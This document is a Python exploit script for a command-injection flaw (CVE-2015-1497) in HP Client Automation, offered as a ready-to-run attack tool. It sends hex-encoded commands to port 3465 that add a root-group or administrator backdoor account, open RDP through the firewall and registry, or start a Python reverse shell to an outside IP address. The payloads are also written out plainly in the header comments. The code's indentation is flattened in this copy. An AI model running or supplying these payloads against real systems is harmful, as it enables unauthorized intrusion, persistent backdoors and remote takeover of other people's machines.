# Exploit Title: [HP Client - Automation Command Injection]
# Date: [10/10/2016]
# Exploit Author: [SlidingWindow] , Twitter: @kapil_khot
# Vendor Homepage: [Previosuly HP, now http://www.persistentsys.com/]
# Version: [Tested on version 7.9 but should work on 8.1, 9.0, 9.1 too]
# Tested on: [Windows 7 and CentOS release 6.7 (Final)]
# CVE : [CVE-2015-1497]
#Can run following commands on linux target
#Useradd Payload: hide hide sh -c ' useradd amiroot -p ID/JlXFIWowsE -g root'
#Reverse Shell Payload: hide hide sh -c "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.35.140",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'"
#Runs following commands on Windows target
#hide hide cmd.exe /c net user hack3r "hack3r" /add
#hide hide cmd.exe /c net localgroup administrators hack3r /add
#hide hide cmd.exe /c net localgroup "Remote Desktop Users" hack3r /add
#hide hide cmd.exe /c netsh firewall set service RemoteDesktop enable
#hide hide cmd/exe /c netsh firewall set service type=RemoteDesktop mode=enable profile=ALL
#hide hide cmd/exe /c reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
import sys,socket
print("\n# Exploit Title: [HP Client - Automation Command Injection]\n# Date: [10/10/2016]\n# Exploit Author: [SlidingWindow] , Twitter: @kapil_khot\n# Vendor Homepage: [Previosuly HP, now http://www.persistentsys.com/]\n# Version: [7.9, 8.1, 9.0, 9.1]\n# Tested on: [Windows 7, CentOS release 6.7 (Final)]\n# CVE : [CVE-2015-1497]\n")
def exploit_Linux(target_IP,exploit_param):
if exploit_param == "1":
print("\n[+]Adding privileged user amiroot/nopass")
request = "\x00"
request+= "\x31\x32\x33\x31\x32\x33\x00"
request+= "\x41\x42\x43\x00"
request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x73\x68\x20\x2d\x63\x20\x27\x20\x75\x73\x65\x72\x61\x64\x64\x20\x61\x6d\x69\x72\x6f\x6f\x74\x20\x2d\x70\x20\x49\x44\x2f\x4a\x6c\x58\x46\x49\x57\x6f\x77\x73\x45\x20\x20\x2d\x67\x20\x72\x6f\x6f\x74\x27\x00"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_IP, 3465))
s.send(request)
response = s.recv(1024)
if response == "\x00":
print("[+]Successfully added user amiroot/nopass")
else:
print("[-]Failed to add user amiroot/nopass")
s.close()
elif exploit_param == "2":
print("\n[+]Trying to get a reverse shell")
request = "\x00"
request+= "\x31\x32\x33\x31\x32\x33\x00"
request+= "\x41\x42\x43\x00"
#Change this
#Reverse Shell Payload: hide hide sh -c "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.35.140",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'"
request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x73\x68\x20\x2d\x63\x20\x22\x70\x79\x74\x68\x6f\x6e\x20\x2d\x63\x20\x27\x69\x6d\x70\x6f\x72\x74\x20\x73\x6f\x63\x6b\x65\x74\x2c\x73\x75\x62\x70\x72\x6f\x63\x65\x73\x73\x2c\x6f\x73\x3b\x73\x3d\x73\x6f\x63\x6b\x65\x74\x2e\x73\x6f\x63\x6b\x65\x74\x28\x73\x6f\x63\x6b\x65\x74\x2e\x41\x46\x5f\x49\x4e\x45\x54\x2c\x73\x6f\x63\x6b\x65\x74\x2e\x53\x4f\x43\x4b\x5f\x53\x54\x52\x45\x41\x4d\x29\x3b\x73\x2e\x63\x6f\x6e\x6e\x65\x63\x74\x28\x28\x5c\x22\x31\x30\x2e\x31\x30\x2e\x33\x35\x2e\x31\x34\x30\x5c\x22\x2c\x34\x34\x33\x29\x29\x3b\x6f\x73\x2e\x64\x75\x70\x32\x28\x73\x2e\x66\x69\x6c\x65\x6e\x6f\x28\x29\x2c\x30\x29\x3b\x20\x6f\x73\x2e\x64\x75\x70\x32\x28\x73\x2e\x66\x69\x6c\x65\x6e\x6f\x28\x29\x2c\x31\x29\x3b\x20\x6f\x73\x2e\x64\x75\x70\x32\x28\x73\x2e\x66\x69\x6c\x65\x6e\x6f\x28\x29\x2c\x32\x29\x3b\x70\x3d\x73\x75\x62\x70\x72\x6f\x63\x65\x73\x73\x2e\x63\x61\x6c\x6c\x28\x5b\x5c\x22\x2f\x62\x69\x6e\x2f\x73\x68\x5c\x22\x2c\x5c\x22\x2d\x69\x5c\x22\x5d\x29\x3b\x27\x22\x00"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_IP, 3465))
s.send(request)
response = s.recv(1024)
if response == "\x00":
print("[+]Exploit completed successfully.\n[+]Try to SSH into the target with username/password: amiroot/nopass")
else:
print("[-]Failed to get reverse shell")
s.close()
else:
print("\n[-]Invalid exploit parameter provided for Linux target")
sys.exit()
def exploit_Windows(target_IP):
counter = 0
print("[+]Adding a local user hack3r/hack3r")
request = "\x00"
request+= "\x31\x32\x33\x31\x32\x33\x00"
request+= "\x41\x42\x43\x00"
request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x68\x61\x63\x6b\x33\x72\x20\x22\x68\x61\x63\x6b\x33\x72\x22\x20\x2f\x61\x64\x64\x00"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_IP, 3465))
s.send(request)
response = s.recv(1024)
if response == "\x00":
print("[+]Successfully added user hack3r/hack3r")
counter+= 1
else:
print("[-]Failed to add user hack3r/hack3r")
s.close()
print("[+]Adding user 'hack3r' to Local Administrator's group")
request = "\x00"
request+= "\x31\x32\x33\x31\x32\x33\x00"
request+= "\x41\x42\x43\x00"
request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73\x20\x68\x61\x63\x6b\x33\x72\x20\x2f\x61\x64\x64\x00"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_IP, 3465))
s.send(request)
response = s.recv(1024)
if response == "\x00":
print("[+]Successfully added user 'hack3r' to Local Administrators group")
counter+= 1
else:
print("[-]Failed to add user to 'hack3r' Local Administrators group")
s.close()
#Add user Hack3r to "Remote Desktop Users" Group
print("[+]Adding user 'hack3r' to 'Remote Desktop Users' group")
request = "\x00"
request+= "\x31\x32\x33\x31\x32\x33\x00"
request+= "\x41\x42\x43\x00"
request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70\x20\x22\x52\x65\x6d\x6f\x74\x65\x20\x44\x65\x73\x6b\x74\x6f\x70\x20\x55\x73\x65\x72\x73\x22\x20\x68\x61\x63\x6b\x33\x72\x20\x2f\x61\x64\x64\x00"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_IP, 3465))
s.send(request)
response = s.recv(1024)
if response == "\x00":
print("[+]Successfully added user 'hack3r' to 'Remote Desktop Users' group")
counter+= 1
else:
print("[-]Failed to add user 'hack3r' to 'Remote Desktop Users' group")
s.close()
#Enable RDP
print("[+]Trying to enable Remote Desktop Service")
request = "\x00"
request+= "\x31\x32\x33\x31\x32\x33\x00"
request+= "\x41\x42\x43\x00"
request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x73\x68\x20\x66\x69\x72\x65\x77\x61\x6c\x6c\x20\x73\x65\x74\x20\x73\x65\x72\x76\x69\x63\x65\x20\x52\x65\x6d\x6f\x74\x65\x44\x65\x73\x6b\x74\x6f\x70\x20\x65\x6e\x61\x62\x6c\x65\x00"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_IP, 3465))
s.send(request)
response = s.recv(1024)
if response == "\x00":
print("[+]Successfully enabled Remote Desktop Service")
counter+= 1
else:
print("[-]Failed to enable Remote Desktop Service")
s.close()
#Enable RDP for all profiles
print("[+]Trying to enable Remote Desktop Service for all firewall profiles")
request = "\x00"
request+= "\x31\x32\x33\x31\x32\x33\x00"
request+= "\x41\x42\x43\x00"
request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x73\x68\x20\x66\x69\x72\x65\x77\x61\x6c\x6c\x20\x73\x65\x74\x20\x73\x65\x72\x76\x69\x63\x65\x20\x74\x79\x70\x65\x3d\x52\x65\x6d\x6f\x74\x65\x44\x65\x73\x6b\x74\x6f\x70\x20\x6d\x6f\x64\x65\x3d\x65\x6e\x61\x62\x6c\x65\x20\x70\x72\x6f\x66\x69\x6c\x65\x3d\x41\x4c\x4c\x00"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_IP, 3465))
s.send(request)
response = s.recv(1024)
if response == "\x00":
print("[+]Successfully enabled Remote Desktop Service for all firewall profiles")
counter+= 1
else:
print("[-]Failed to enable Remote Desktop Service for all firewall profiles")
s.close()
#Setup target to listen for RDP connections
print("[+]Setting up the target server to listen to RDP connections")
request = "\x00"
request+= "\x31\x32\x33\x31\x32\x33\x00"
request+= "\x41\x42\x43\x00"
request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x09\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x72\x65\x67\x20\x61\x64\x64\x20\x22\x48\x4b\x45\x59\x5f\x4c\x4f\x43\x41\x4c\x5f\x4d\x41\x43\x48\x49\x4e\x45\x5c\x53\x59\x53\x54\x45\x4d\x5c\x43\x75\x72\x72\x65\x6e\x74\x43\x6f\x6e\x74\x72\x6f\x6c\x53\x65\x74\x5c\x43\x6f\x6e\x74\x72\x6f\x6c\x5c\x54\x65\x72\x6d\x69\x6e\x61\x6c\x20\x53\x65\x72\x76\x65\x72\x22\x20\x2f\x76\x20\x66\x44\x65\x6e\x79\x54\x53\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x73\x20\x2f\x74\x20\x52\x45\x47\x5f\x44\x57\x4f\x52\x44\x20\x2f\x64\x20\x30\x20\x2f\x66\x00"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_IP, 3465))
s.send(request)
response = s.recv(1024)
if response == "\x00":
print("[+]Successfully setup the target server to listen to RDP connections")
counter+= 1
else:
print("[-]Failed to setup the target server to listen to RDP connections")
s.close()
if counter == 6:
print("\n[+]Exploit completed successfully. Try RDP to the target with username/password: hack3r/hack3r")
else:
print("\n[-]Exploit Failed..")
#main() function here
def main():
if len(sys.argv) < 2:
print "\n[-]Usage: \nWindows Target:\ntpython HP_Client_Automation_Exploit.py <target_ip> Windows\n\nLinux Target:\ntpython HP_Client_Automation_Exploit.py <target_ip> Linux [1|2]\n\t\t1.Add user\nt\t2.Reverse Shell"
sys.exit()
target_IP = sys.argv[1]
target_OS = sys.argv[2].lower()
if target_OS == "windows":
exploit_Windows(target_IP)
elif target_OS == "linux":
exploit_param = sys.argv[3]
exploit_Linux(target_IP,exploit_param)
else:
print("\n[-]Invalid taret Operating System selected.")
sys.exit()
if __name__ == '__main__':
main()